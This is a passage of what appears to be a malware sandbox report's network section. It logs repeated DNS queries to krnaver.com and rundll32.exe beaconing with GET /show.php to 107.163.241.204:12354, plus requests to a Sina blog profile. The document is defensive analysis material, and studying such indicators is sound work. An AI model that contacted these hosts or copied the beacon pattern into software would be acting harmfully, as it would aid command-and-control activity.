                                                      Dec 11, 2024 16:27:51.219880104 CET1235459536107.163.241.204192.168.2.9

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 11, 2024 16:23:48.134955883 CET6319353192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:23:48.463033915 CET53631931.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:23:53.177128077 CET5912853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:23:53.323084116 CET53591281.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:23:54.377567053 CET5673253192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:23:55.108138084 CET53567321.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:23:58.149368048 CET5240353192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:23:58.288192987 CET53524031.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:03.081752062 CET5328053192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:03.224092960 CET53532801.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:08.131623983 CET5729853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:08.269882917 CET53572981.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:13.097973108 CET4980353192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:13.235120058 CET53498031.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:18.117557049 CET5545253192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:18.257143974 CET53554521.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:23.034487963 CET5077753192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:23.174499035 CET53507771.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:28.078454971 CET4990753192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:28.216144085 CET53499071.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:33.080496073 CET5473053192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:33.219189882 CET53547301.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:38.044671059 CET5547553192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:38.184889078 CET53554751.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:43.049757957 CET5663953192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:43.186640978 CET53566391.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:48.033945084 CET6503753192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:48.172885895 CET53650371.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:53.033766985 CET5395153192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:53.171343088 CET53539511.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:24:58.036268950 CET5934453192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:24:58.177948952 CET53593441.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:03.034158945 CET5691953192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:03.182950020 CET53569191.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:08.050052881 CET5368253192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:08.187616110 CET53536821.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:13.033826113 CET5330953192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:13.171004057 CET53533091.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:18.033634901 CET5466853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:18.170556068 CET53546681.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:23.033405066 CET4938853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:23.171688080 CET53493881.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:28.034729958 CET6452053192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:28.176424026 CET53645201.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:33.036647081 CET6519053192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:33.174803019 CET53651901.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:38.033790112 CET6054853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:38.172979116 CET53605481.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:43.180083990 CET6260253192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:43.317728043 CET53626021.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:48.033415079 CET6268053192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:48.170696020 CET53626801.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:53.033035040 CET6365553192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:53.170140982 CET53636551.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:25:58.033778906 CET5019253192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:25:58.170383930 CET53501921.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:03.421081066 CET5698153192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:03.560072899 CET53569811.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:08.033699036 CET6338053192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:08.170670986 CET53633801.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:13.047230959 CET5191453192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:13.186279058 CET53519141.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:18.036427975 CET6502753192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:18.416712046 CET53650271.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:23.032952070 CET5105353192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:23.169904947 CET53510531.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:28.034754038 CET5882153192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:28.172286987 CET53588211.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:33.034229994 CET5280653192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:33.171458960 CET53528061.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:38.033224106 CET6456153192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:38.170221090 CET53645611.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:43.044070005 CET5406953192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:43.181580067 CET53540691.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:48.123034954 CET5546453192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:48.260138035 CET53554641.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:53.033762932 CET5995853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:53.171478987 CET53599581.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:26:58.087189913 CET6239853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:26:58.225267887 CET53623981.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:03.033389091 CET5113853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:03.170698881 CET53511381.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:04.398503065 CET5851753192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:04.536482096 CET53585171.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:08.033149958 CET5474653192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:08.169969082 CET53547461.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:13.033689976 CET5989353192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:13.172096014 CET53598931.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:18.033071041 CET6110953192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:18.191616058 CET53611091.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:23.033158064 CET5414853192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:23.172271967 CET53541481.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:28.035818100 CET5292953192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:28.175961018 CET53529291.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:33.033041954 CET5045053192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:33.169715881 CET53504501.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:38.036232948 CET5739953192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:38.173353910 CET53573991.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:43.033835888 CET6296953192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:43.170574903 CET53629691.1.1.1192.168.2.9
                                                      Dec 11, 2024 16:27:48.038427114 CET5865753192.168.2.91.1.1.1
                                                      Dec 11, 2024 16:27:48.175087929 CET53586571.1.1.1192.168.2.9

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 11, 2024 16:23:48.134955883 CET192.168.2.91.1.1.10x37f6Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:23:53.177128077 CET192.168.2.91.1.1.10xbe6aStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:23:54.377567053 CET192.168.2.91.1.1.10x9502Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:23:58.149368048 CET192.168.2.91.1.1.10x9ce2Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:03.081752062 CET192.168.2.91.1.1.10x6357Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:08.131623983 CET192.168.2.91.1.1.10x8362Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:13.097973108 CET192.168.2.91.1.1.10x7a94Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:18.117557049 CET192.168.2.91.1.1.10x841aStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:23.034487963 CET192.168.2.91.1.1.10x1abfStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:28.078454971 CET192.168.2.91.1.1.10xc383Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:33.080496073 CET192.168.2.91.1.1.10xdcc4Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:38.044671059 CET192.168.2.91.1.1.10xe252Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:43.049757957 CET192.168.2.91.1.1.10x32dStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:48.033945084 CET192.168.2.91.1.1.10x7482Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:53.033766985 CET192.168.2.91.1.1.10x48dcStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:24:58.036268950 CET192.168.2.91.1.1.10xeb77Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:03.034158945 CET192.168.2.91.1.1.10x18f8Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:08.050052881 CET192.168.2.91.1.1.10x3bc2Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:13.033826113 CET192.168.2.91.1.1.10x844fStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:18.033634901 CET192.168.2.91.1.1.10x3b4bStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:23.033405066 CET192.168.2.91.1.1.10x3674Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:28.034729958 CET192.168.2.91.1.1.10x6179Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:33.036647081 CET192.168.2.91.1.1.10x2c4dStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:38.033790112 CET192.168.2.91.1.1.10xb426Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:43.180083990 CET192.168.2.91.1.1.10xe232Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:48.033415079 CET192.168.2.91.1.1.10xa5efStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:53.033035040 CET192.168.2.91.1.1.10xcf6cStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:25:58.033778906 CET192.168.2.91.1.1.10x8b87Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:03.421081066 CET192.168.2.91.1.1.10x425bStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:08.033699036 CET192.168.2.91.1.1.10x7f80Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:13.047230959 CET192.168.2.91.1.1.10xd1ccStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:18.036427975 CET192.168.2.91.1.1.10xb017Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:23.032952070 CET192.168.2.91.1.1.10xd7dbStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:28.034754038 CET192.168.2.91.1.1.10xe63dStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:33.034229994 CET192.168.2.91.1.1.10x7716Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:38.033224106 CET192.168.2.91.1.1.10xd245Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:43.044070005 CET192.168.2.91.1.1.10x77d7Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:48.123034954 CET192.168.2.91.1.1.10xf21eStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:53.033762932 CET192.168.2.91.1.1.10xe89eStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:26:58.087189913 CET192.168.2.91.1.1.10xd218Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:03.033389091 CET192.168.2.91.1.1.10x79bcStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:04.398503065 CET192.168.2.91.1.1.10x93ecStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:08.033149958 CET192.168.2.91.1.1.10x5659Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:13.033689976 CET192.168.2.91.1.1.10xe6eeStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:18.033071041 CET192.168.2.91.1.1.10x351bStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:23.033158064 CET192.168.2.91.1.1.10x8553Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:28.035818100 CET192.168.2.91.1.1.10x75b1Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:33.033041954 CET192.168.2.91.1.1.10xc5f7Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:38.036232948 CET192.168.2.91.1.1.10xca72Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:43.033835888 CET192.168.2.91.1.1.10xc0e4Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:48.038427114 CET192.168.2.91.1.1.10xeed6Standard query (0)krnaver.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 11, 2024 16:23:40.049406052 CET1.1.1.1192.168.2.90xd84bNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Dec 11, 2024 16:23:40.049406052 CET1.1.1.1192.168.2.90xd84bNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:23:55.108138084 CET1.1.1.1192.168.2.90x9502No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                                      Dec 11, 2024 16:23:55.108138084 CET1.1.1.1192.168.2.90x9502No error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false
                                                      Dec 11, 2024 16:27:04.536482096 CET1.1.1.1192.168.2.90x93ecNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                                      Dec 11, 2024 16:27:04.536482096 CET1.1.1.1192.168.2.90x93ecNo error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • blog.sina.com.cn
                                                      • 107.163.241.204:12354

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.949750107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:51.775649071 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.949751107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:51.775754929 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.949772107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:54.125768900 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.949773107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:54.125861883 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.949784202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:55.231003046 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:23:56.789465904 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:23:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.949796107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:56.484150887 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.949798107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:56.671241045 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.949814107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:58.139686108 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.949815107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:58.322012901 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.949816202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:23:58.323337078 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:23:59.828609943 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:23:59 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.949840107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:00.375739098 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.949842107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:00.503346920 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.949857107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:02.138027906 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.949859202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:02.292270899 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:03.868853092 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:03 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.949860107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:02.292548895 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.949884107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:04.405234098 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.949887107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:04.542387962 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
